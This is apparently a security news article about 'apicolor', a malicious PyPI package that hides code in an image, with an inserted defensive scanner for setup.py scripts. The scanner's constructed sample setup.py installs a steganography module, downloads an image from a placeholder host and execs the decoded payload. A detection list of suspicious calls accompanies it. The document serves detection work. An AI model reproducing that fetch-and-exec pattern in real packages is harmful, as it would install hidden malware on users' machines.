A malicious PyPI package hides code through steganography

November 15, 2022
Malicious Code apicolor PyPI Hidden Code Steganography Obfuscation Threat Intelligence

Security researchers have recently found a new malicious package in the Python Package Index (PyPI) that hides code inside images using a steganographic technique and can infect users of GitHub’s open-source projects.

According to the published advisory, the malicious package, dubbed ‘apicolor’, looked like one of the many in-development packages on PyPI. After in-depth analysis, however, the package was found to contain a strange, non-trivial code section at the beginning that concerned the researchers.

The malicious code manually installs additional requirements, downloads an image from the internet, uses the freshly installed package to process that image, and then runs the generated output via the exec command.

The apicolor package hides its activity in the setup script, the file used to specify a package’s metadata. From there, it pulls in a second package called ‘judyb’ and a benign-looking PNG file hosted on the image-sharing website Imgur.

Researchers explained that the judyb code is a steganography module for hiding and revealing messages inside images. The package uses it to extract obfuscated Python code embedded in the downloaded image; that code in turn retrieves and executes a malicious binary from the threat operators’ remote server.
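To make the install-time chain described above concrete from the defender’s side, here is an added example (not code from the article, the researchers, or the apicolor package): a small Python AST scanner that inspects a setup.py and flags the pattern of spawning pip, fetching a remote file, importing an image or steganography library, and handing the result to exec. The sample setup.py it scans is constructed to mimic that chain; the `lsb.reveal` call in it is an assumed judyb API name, the URL is a placeholder, and the list of suspicious call names is the author’s own starting point, not an exhaustive rule set.

```python
"""Static scanner for install-time scripts (setup.py) that flags the
fetch -> decode -> exec chain. Added example; not the article's code."""
import ast
from dataclasses import dataclass, field

# Dotted call names that are unusual in a legitimate setup script.
SUSPICIOUS_CALLS = {
    "exec": "dynamic code execution (exec)",
    "eval": "dynamic code execution (eval)",
    "os.system": "shell command run from setup script",
    "subprocess.run": "subprocess spawned from setup script",
    "subprocess.call": "subprocess spawned from setup script",
    "subprocess.check_call": "subprocess spawned from setup script",
    "subprocess.check_output": "subprocess spawned from setup script",
    "subprocess.Popen": "subprocess spawned from setup script",
    "urllib.request.urlopen": "network download at install time",
    "urllib.request.urlretrieve": "network download at install time",
    "requests.get": "network download at install time",
}
# Top-level modules whose import in setup.py suggests payload decoding.
SUSPICIOUS_IMPORTS = {
    "PIL": "image processing in setup script",
    "judyb": "steganography module in setup script",
}

@dataclass
class ScanResult:
    findings: list = field(default_factory=list)
    pip_install: bool = False    # pip driven from a spawned command
    downloads: bool = False      # remote file fetched at install time
    executes: bool = False       # exec/eval of runtime-built code
    decodes_image: bool = False  # image/stego library imported

    @property
    def risk(self):
        """'high' when the full fetch -> decode -> exec chain is present."""
        if self.downloads and self.executes and (self.decodes_image or self.pip_install):
            return "high"
        if self.downloads or self.executes:
            return "medium"
        return "low"

class _Visitor(ast.NodeVisitor):
    def __init__(self, result):
        self.r = result
        self.aliases = {}  # local name -> fully qualified module/attribute

    def _note(self, node, text):
        self.r.findings.append(f"line {node.lineno}: {text}")

    def _check_import(self, node, full_name):
        top = full_name.split(".")[0]
        if top in SUSPICIOUS_IMPORTS:
            self._note(node, f"import {full_name}: {SUSPICIOUS_IMPORTS[top]}")
            self.r.decodes_image = True

    def visit_Import(self, node):
        for alias in node.names:
            self.aliases[alias.asname or alias.name] = alias.name
            self._check_import(node, alias.name)

    def visit_ImportFrom(self, node):
        if node.module:  # skip relative imports ("from . import x")
            for alias in node.names:
                full = f"{node.module}.{alias.name}"
                self.aliases[alias.asname or alias.name] = full
                self._check_import(node, full)

    def _qualified(self, node):
        """Resolve a Name/Attribute chain to 'pkg.mod.attr', honouring aliases."""
        parts = []
        while isinstance(node, ast.Attribute):
            parts.append(node.attr)
            node = node.value
        if not isinstance(node, ast.Name):
            return None
        parts.append(self.aliases.get(node.id, node.id))
        return ".".join(reversed(parts))

    def visit_Call(self, node):
        name = self._qualified(node.func)
        if name in SUSPICIOUS_CALLS:
            self._note(node, f"{name}(): {SUSPICIOUS_CALLS[name]}")
            if name in ("exec", "eval"):
                self.r.executes = True
            elif name.startswith(("urllib.", "requests.")):
                self.r.downloads = True
            else:
                # A spawned command whose arguments mention pip is a manual install.
                strings = [c.value for c in ast.walk(node)
                           if isinstance(c, ast.Constant) and isinstance(c.value, str)]
                if "pip" in strings or any("pip install" in s for s in strings):
                    self.r.pip_install = True
        self.generic_visit(node)

def scan_setup_source(source):
    """Parse setup.py source text and return a ScanResult."""
    result = ScanResult()
    _Visitor(result).visit(ast.parse(source))
    return result

# Constructed sample mimicking the chain in the article; not the real package.
SAMPLE_SETUP_PY = '''
import subprocess, sys
from setuptools import setup
subprocess.check_call([sys.executable, "-m", "pip", "install", "judyb", "Pillow"])
import urllib.request
from judyb import lsb  # assumed API name, for illustration only
urllib.request.urlretrieve("https://example.invalid/cover.png", "cover.png")
payload = lsb.reveal("cover.png")
exec(payload)
setup(name="example-pkg", version="0.0.1")
'''

if __name__ == "__main__":
    res = scan_setup_source(SAMPLE_SETUP_PY)
    print("risk:", res.risk)
    for f in res.findings:
        print(" -", f)
```

Run against the sample, the scanner reports four findings (the pip subprocess, the judyb import, the download and the exec) and rates the script "high"; a plain setuptools-only script rates "low". The point is that none of these calls is malicious alone, but their co-occurrence in code that runs at install time is exactly the shape described above and is cheap to flag before a package is installed.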

Users searching online for legitimate open-source projects are warned that some of them may be hiding a malicious PyPI package that can infect them.

Researchers noted that this newly discovered malicious PyPI package is distinct from all the other packages they had previously analysed because of how it hides its code to target PyPI users and infect them through malicious GitHub imports.

Furthermore, this discovery indicates that threat actors hiding malicious PyPI packages with advanced obfuscation techniques such as steganography are a rapidly evolving problem. The operators take a meticulous approach, hiding the code and making the malicious packages on PyPI look unremarkable, which the researchers consider sophisticated work.

GitHub’s open-source project users and companies are advised to deploy code scanners in their infrastructure to assess third-party packages in depth and to confirm that GitHub project ratings have not been faked.
